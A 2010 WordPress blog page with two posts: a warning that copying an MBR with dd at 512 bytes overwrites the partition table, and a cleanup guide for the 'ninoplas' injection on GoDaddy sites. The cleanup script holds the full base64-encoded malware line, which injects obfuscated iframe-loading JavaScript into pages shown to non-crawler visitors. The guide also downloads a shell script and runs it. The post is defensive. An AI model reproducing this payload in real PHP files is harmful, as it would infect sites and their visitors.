Inspirated

 
 

June 4, 2010

How NOT to copy MBR with the dd command

Filed under: Blog — krkhan @ 8:39 pm

Yesterday I needed to copy the MBR of a drive over another. Googling a little I found the following command in various tutorials:

-bash-$ dd if=/dev/sda of=/dev/sdb bs=512 count=1

Where /dev/sda and /dev/sda were the original and target hard disks respectively. The command did complete its work in a snap but it also made me learn a thing about MBR structures the hard way: Only 446 bytes of the MBR contain boot code, the next 64 contain the partition table!

The implications of the lesson being, if partition tables of both hard disks differ — which unfortunately was the case with me — the partition table of the target hard-disk will be overwritten. The correct way would therefore be:

-bash-$ dd if=/dev/sda of=/dev/sdb bs=446 count=1

In case you did mess up the table, I recommend TestDisk for recovering your partitions.

Tags: , , , , , ,

March 2, 2010

GoDaddy/WordPress ninoplas Base64 virus and the fix

Filed under: Blog — krkhan @ 7:40 pm

Update: The virus seems to have affected only GoDaddy websites, hence the change in title.

Few hours ago I opened my website and noticed some rather strange Javascript hanging around the bottom. After some inspection, it became evident that every page on my blog was trying to load an IFrame to some place called ninoplas.com. Turns out, I wasn’t alone and there are other users as well who are affected by this. Judging by the fact that different blogs were attacked at the same time, this was in all probability the result of a security hole in some plugin or the core itself.

The virus acted by adding a piece of encrypted code on the first line of all PHP files on the server. It’s rather unsettling to consider the extend of damage that could have been caused with the write access to those files. Still, the damage could be rectified by simply deleting those lines. I wrote a tiny script for doing this job which cleans the ninoplas virus from all the PHP files in the current directory:

clean-ninoplas.sh

1
2
3

#!/bin/bash
needle='aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkRDUyWVhJZ1luQjRSSE5UWW0wNFBTZGtLaVZBYnlvbFFHTXFKVUIxS2lWQWJTb2xRR1VxSlVCdUtpVkFkQ29sUUM0cUpVQjNLaVZBY2lvbFFHa3FKVUIwS2lWQVpTb2xRQ2dxSlVCY0p5b2xRRHdxSlVCcEtpVkFaaW9sUUhJcUpVQmhLaVZBYlNvbFFHVXFKVUFnS2lWQWN5b2xRSElxSlVCaktpVkFQU29sUUNJcUpVQm9LaVZBZENvbFFIUXFKVUJ3S2lWQU9pb2xRQzhxSlVBdktpVkFiaW9sUUdrcUpVQnVLaVZBYnlvbFFIQXFKVUJzS2lWQVlTb2xRSE1xSlVBdUtpVkFZeW9sUUc4cUpVQnRLaVZBTHlvbFFHa3FKVUJ1S2lWQUxpb2xRSEFxSlVCb0tpVkFjQ29sUUNJcUpVQWdLaVZBZHlvbFFHa3FKVUJrS2lWQWRDb2xRR2dxSlVBOUtpVkFNaW9sUUNBcUpVQm9LaVZBWlNvbFFHa3FKVUJuS2lWQWFDb2xRSFFxSlVBOUtpVkFNaW9sUUNBcUpVQm1LaVZBY2lvbFFHRXFKVUJ0S2lWQVpTb2xRR0lxSlVCdktpVkFjaW9sUUdRcUpVQmxLaVZBY2lvbFFEMHFKVUF3S2lWQVBpb2xRRHdxSlVBdktpVkFhU29sUUdZcUpVQnlLaVZBWVNvbFFHMHFKVUJsS2lWQVBpb2xRRnduS2lWQUtTb2xRRHNxSlVBbk8yVjJZV3dvWW5CNFJITlRZbTA0TG5Od2JHbDBLQ2NxSlVBbktTNXFiMmx1S0NJaUtTazdQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9'
grep -rl $needle | xargs sed -i '1d'

Warning: While this script has worked for me, I am in no way providing any guarantee for how it behaves on other blogs. Backup your blog as well as database before executing this script.
You have been warned.

Using the fix is a simple matter of:

-bash-$ cd wordpress
-bash-$ wget http://inspirated.com/uploads/clean-ninoplas.sh
-bash-$ sh clean-ninoplas.sh

And don’t forget to backup everything again after cleaning up. The security hole — if there is one — has still not been tracked and if it’s in the core or some plugin which you’re still using, the virus might not be so benevolent next time.

Tags: , , , , , , ,
 
Valid XHTML 1.0 Transitional Valid CSS Viewable with any browser Creative Commons License

This work is licensed under a Creative Commons Attribution-Share Alike 3.0 License
Powered by WordPress